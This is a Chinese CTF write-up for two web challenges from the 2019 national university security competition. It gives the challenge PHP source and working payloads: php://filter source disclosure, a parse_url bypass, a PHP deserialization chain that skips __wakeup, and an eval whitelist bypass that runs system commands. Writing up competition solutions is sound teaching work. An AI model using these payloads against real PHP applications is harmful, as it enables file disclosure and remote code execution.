2. 程式人生 > >2019全國大學生信息安全競賽部分Web writeup

2019全國大學生信息安全競賽部分Web writeup

阿新 發佈:2019-04-24
bin lse rand 數學 .com sch font 數學函數 attacked

JustSoso

0x01

審查元素發現了提示,偽協議拿源碼

/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

 1 <?php
 2 error_reporting(0);
 3 $file = $_GET["file"];
 4 $payload = $_GET["payload"];
 5 if (!isset($file)) {
 6     echo ‘Missing parameter‘ . ‘<br>‘;
 7 }
 8 if (preg_match("/flag/", $file
 
)) {
 9     die(‘hack attacked!!!‘);
10 }
11 @include ($file);
12 if (isset($payload)) {
13     $url = parse_url($_SERVER[‘REQUEST_URI‘]);
14     parse_str($url[‘query‘], $query);
15     foreach ($query as $value) {
16         if (preg_match("/flag/", $value)) {
17             die(‘stop hacking!‘);
18             exit
 
();
19         }
20     }
21     $payload = unserialize($payload);
22 } else {
23     echo "Missing parameters";
24 } ?>

/index.php?file=php://filter/read=convert.base64-encode/resource=hint.php

 1 <?php  
 2 class Handle{ 
 3     private $handle;  
 4     public function __wakeup(){
 5   foreach(get_object_vars
 
($this) as $k => $v) {
 6             $this->$k = null;
 7         }
 8         echo "Waking up\n";
 9     }
10  public function __construct($handle) { 
11         $this->handle = $handle; 
12     } 
13  public function __destruct(){
14   $this->handle->getFlag();
15  }
16 }
17 
18 class Flag{
19     public $file;
20     public $token;
21     public $token_flag;
22  
23     function __construct($file){
24   $this->file = $file;
25   $this->token_flag = $this->token = md5(rand(1,10000));
26     }
27     
28  public function getFlag(){
29   $this->token_flag = md5(rand(1,10000));
30         if($this->token === $this->token_flag)
31   {
32    if(isset($this->file)){
33     echo @highlight_file($this->file,true); 
34             }  
35         }
36     }
37 }
38 ?>
0x02 通過查看parse_url()函數的官方文檔得知: 這個函數是專門用於解析url而不是uri的。但是,為了符合PHP的向後兼容性要求,它對file://scheme做了一個例外,其中允許使用三斜杠(file:///…),對於任何其他方案,這都是無效的。 因此通過///index.php繞過parse_url()函數限制 0x03 構造反序列化 技術分享圖片

$handle由private修飾,所以要在前面加上%00

O:6:"Handle":1:{s:14:"%00Handle%00handle";O:4:"Flag":3:{s:4:"file";s:8:"flag.php";s:5:"token";N;s:10:"token_flag";R:4;}}

_wakeup()繞過

反序列化時,如果表示對象屬性個數的值大於真實的屬性個數時就會跳過_wakeup()的執行

O:6:"Handle":2:{s:14:"%00Handle%00handle";O:4:"Flag":3:{s:4:"file";s:8:"flag.php";s:5:"token";N;s:10:"token_flag";R:4;}}

最終payload為:

///index.php?file=hint.php&payload=O:6:%22Handle%22:2:{s:14:%22%00Handle%00handle%22;O:4:%22Flag%22:3:{s:4:%22file%22;s:8:%22flag.php%22;s:5:%22token%22;N;s:10:%22token_flag%22;R:4;}}

love_math

審查元素,在js代碼中發現calc,php,訪問得到源碼

技術分享圖片

 1 <?php 
 2 error_reporting(0); 
 3 //聽說你很喜歡數學,不知道你是否愛它勝過愛flag 
 4 if(!isset($_GET[‘c‘])){ 
 5     show_source(__FILE__); 
 6 }else{ 
 7     //例子 c=20-1 
 8     $content = $_GET[‘c‘]; 
 9     if (strlen($content) >= 80) { 
10         die("太長了不會算"); 
11     } 
12     $blacklist = [‘ ‘, ‘\t‘, ‘\r‘, ‘\n‘,‘\‘‘, ‘"‘, ‘`‘, ‘\[‘, ‘\]‘]; 
13     foreach ($blacklist as $blackitem) { 
14         if (preg_match(‘/‘ . $blackitem . ‘/m‘, $content)) { 
15             die("請不要輸入奇奇怪怪的字符"); 
16         } 
17     } 
18     //常用數學函數http://www.w3school.com.cn/php/php_ref_math.asp 
19     $whitelist = [‘abs‘, ‘acos‘, ‘acosh‘, ‘asin‘, ‘asinh‘, ‘atan2‘, ‘atan‘, ‘atanh‘, ‘base_convert‘, ‘bindec‘, ‘ceil‘, ‘cos‘, ‘cosh‘, ‘decbin‘, ‘dechex‘, ‘decoct‘, ‘deg2rad‘, ‘exp‘, ‘expm1‘, ‘floor‘, ‘fmod‘, ‘getrandmax‘, ‘hexdec‘, ‘hypot‘, ‘is_finite‘, ‘is_infinite‘, ‘is_nan‘, ‘lcg_value‘, ‘log10‘, ‘log1p‘, ‘log‘, ‘max‘, ‘min‘, ‘mt_getrandmax‘, ‘mt_rand‘, ‘mt_srand‘, ‘octdec‘, ‘pi‘, ‘pow‘, ‘rad2deg‘, ‘rand‘, ‘round‘, ‘sin‘, ‘sinh‘, ‘sqrt‘, ‘srand‘, ‘tan‘, ‘tanh‘]; 
20     preg_match_all(‘/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/‘, $content, $used_funcs); 
21     foreach ($used_funcs[0] as $func) { 
22         if (!in_array($func, $whitelist)) { 
23             die("請不要輸入奇奇怪怪的函數"); 
24         } 
25     } 
26     //幫你算出答案 
27     eval(‘echo ‘.$content.‘;‘); 
28 }

0x02

經過分析:

有長度限制,不能超過80

雖然有/m,但是\r在黑名單中,所以不存在換行繞過

傳給c的參數不能是字母,只允許使用白名單的函數作字符串

要用白名單中的函數將數字轉成字母,發現base_convert()和dechex()兩個函數

0x03

最終payload:

c=$pow%3Dbase_convert(37907361743,10,36)(dechex(1598506324));($$pow){0}(($$pow){1})&0=system&1=cat%20flag.php

解釋如下:

dechex(1598506324)得到的是_GET進行hex編碼的值

base_convert(37907361743,10,36)得到的是函數hex2bin

c的值定義了$pow=_GET,那麽$$pow=$_GET

最後執行的代碼為$_GET{system}($_GET{cat flag.php})

2019全國大學生信息安全競賽部分Web writeup

相關推薦

2019全國大學生安全競賽部分Web writeup

bin lse rand 數學 .com sch font 數學函數 attacked JustSoso 0x01 審查元素發現了提示,偽協議拿源碼 /index.php?file=php://filter/read=convert.base64-encode/resour

2016全國大學生安全競賽(Misc)

學生 pan 機器人 city alt ++ 信息 oot 字符 你好,i春秋: 關註i春秋公眾微信號,然後發送CTF,機器人會問星期幾,按實回答,然後發送你好,機器人會回復你好,然後隨便發幾句,機器人會問是否願意陪他聊天,回復不願意,機器人就會發flag k

2018-2019-1 《安全專業導論》教學進程

license 收藏 tty 名稱 閱讀 href 信息安全系統 ret 嵌入式 《信息安全專業導論》教學進程 目錄 考核方式 教學進程 第01周學習任務和要求 第02周學習任務和要求 第03周學習任務和要求 第04周學習任務和要求 第05周學習任務和要求 第06周學

2018-2019 20165235 《安全系統設計基礎》第一周

png bin lean 所有 文件名 -c printf 開始 圖片 測試1-vi 每個.c一個文件,每個.h一個文件,文件名中最好有自己的學號 用Vi輸入圖中代碼,並用gcc編譯通過 在Vi中使用K查找printf的幫助文檔 提交vi編輯過程截圖,要全屏,包含自己的學

2018-2019-20165235 《安全系統設計基礎》第二周學習總結

xxx 無符號 png 工程師 tis 規格 技術 情況 小時 2018-2019-20165235 《信息安全系統設計基礎》第二周學習總結 教材學習內容總結 1.右移分為邏輯右移(x>>>k)和算術右移(x>>k),其中算術右移是最左端補高位

20165206 2018-2019-1 《安全系統設計基礎》第五周學習總結

充電 inf http 選擇 磁盤容量 寄存器 固態硬盤 請求 學習 - 20165206 2018-2019-1 《信息安全系統設計基礎》第五周學習總結 - 教材學習內容總結 - 隨機訪問存儲器: 隨機訪問存儲器分為兩類:靜態RAM(SRAM)和動態RAM(DRAM)。

2018-2019 20165219 《安全系統設計基礎》第五周學習總結

sram 不同 異步 兩個 記錄 標記 即使 時鐘 info 2018-2019 20165219《信息安全系統設計基礎》第五周學習總結 存儲技術 隨機訪問存儲器:SRAM和DRAM的對比,傳統DRAM和增強 DRAM 增強的DRAM: 快頁模式DRAM:允許對同一行連續地

2018-2019 20165215 《安全系統設計基礎》第六周學習總結

調用 cout 磁盤 grep 語言 根據 shell system stdio.h 2018-2019 20165215 《信息安全系統設計基礎》第六周學習總結 Linux系統調用學習 操作系統(Operating System,簡稱OS)完成的工作比喻為兩個角色:服務

第四屆上海大學生安全比賽----- web3

比較 alt 代碼 進行 比賽 http img -- 。。 這道是源碼題, 源碼: 源碼很簡單,我覺得考得主要是細心 直接看第一個if, 判斷是否上傳了一個文件,然後進去判斷是否POST了一個名為file的參數,如果有上傳這個參數,那麽$filename就等於這個POS

2018-2019-1 《安全系統設計基礎》實驗三:並發程序

大量 inet_pton gin 考題 queue 時間 初始化 設計 127.0.0.1 2018-2019-1 《信息安全系統設計基礎》實驗三:並發程序 任務一 要求: 基於Linux Socket程序設計實現wc(1)服務器(端口號是你學號的後6位)和客戶端 客戶

調研《構建之法》指導下的全國高校的歷屆軟工實踐作品、全國互聯網+競賽、物聯網競賽、華為杯研究生作品賽、全國大學生服務外包賽等各類全國性大學生化相關的競賽平臺的歷屆作品

景區 服務 互聯網+ 整體 守護 人工智能 作品 采集 公司 1、中國“互聯網+”大學生創新創業大賽 感知i家-讓i守護您的安全生活 http://cy.ncss.org.cn/search/79525d41efbf16d3363c138f713d2417

2018-2019-1 20165226 《安全系統設計基礎》第1周學習總結

.cn roc int 出現 miss 可執行 break 生成可執行文件 如何使用 2018-2019-1 20165226 《信息安全系統設計基礎》第1周學習總結 目錄 教材學習內容總結 代碼學習中的問題和解決過程 教材每章提問 代碼托管 其他 學習進

# 2018-2019-1 20165206 《安全系統設計基礎》第1周學習總結

分享圖片 時報 header 如果 mbo table string con 常用 2018-2019-1 20165206 《信息安全系統設計基礎》第1周學習總結 教材學習內容總結 - gcc編譯: 預處理:gcc -E hello.c -o hello.i 編譯:gcc

2018-2019-1 20165228 蘇祚堃《安全系統設計基礎》第一周學習總結

文件的 代碼行數 清除 代碼托管 簡單的 pen 以及 順序 路徑 2018-2019-1 20165228 《信息安全系統設計基礎》第一周學習總結 教材學習內容總結 GCC編譯: 預處理:gcc –E hello.c –o hello.i;gcc –E調用cpp 編 譯

2018-2019-1 20165212 《安全系統設計基礎》第1周學習總結

命令補全 時間 命令 參數 目標 創建 float 方案 sub 2018-2019-1 20165212 《信息安全系統設計基礎》第1周學習總結 教材內容總結 GCC編譯 1.單文件 預處理: gcc -E hello.c -o hello.i 編譯: g

2018-2019-1 20165327 《安全系統設計基礎》第一周學習總結

應用程序 -c 反匯編 系統設計 網絡通信 執行文件 文本文 共享 鏈接 2018-2019-1 20165327 《信息安全系統設計基礎》第一周學習總結 知識總結 第一章hello程序的生命周期 1.hello程序是從源程序開始的。創建並保存hello.c的文本文件。信息

# 2018-2019-1 20165225《安全系統設計基礎》第一周學習總結

存儲 面向對象語言 alt locks vi編輯 開始 blog 動態鏈接 代碼調試 2018-2019-1 20165225《信息安全系統設計基礎》第一周學習總結 教材學習內容總結 vim的用法 命令行輸入vimtutor即可隨時查看: linux系統下文件的轉換

2018-2019-1 20165320 《安全系統設計基礎》第一周學習總結

怎麽 循環 let 系統 main.c 不足 語句 字符 包含 第一章學習總結 1.vim的基本操作與快捷鍵 h 左 l 右(小寫L) j 下 k 上 w 移動到下一個單詞 b 移動到上一個單詞 從普通模式輸入: 進入命令行模式 普

2018-2019-1 20165312 《安全系統設計基礎》第一周學習總結

ive RoCE 學習感悟 -s 問題 src mage .cn 鏈接 2018-2019-1 20165312 《信息安全系統設計基礎》第一周學習總結 一、完成藍墨雲測試時遇到的問題 1.在做共享庫的時候,./20165312share時出現error while loa

2018-2019-1 20165201 《安全系統設計基礎》第1周學習總結

作者 一段 為什麽 text 簡單 學習 深入理解計算機系統 ali 觀點 2018-2019-1 20165201 《信息安全系統設計基礎》第1周學習總結 內容待完善~~~ 教材學習內容總結 盡量簡單的總結一下本周學習內容 盡量不要抄書,浪費時間 看懂就過,看不懂,學習有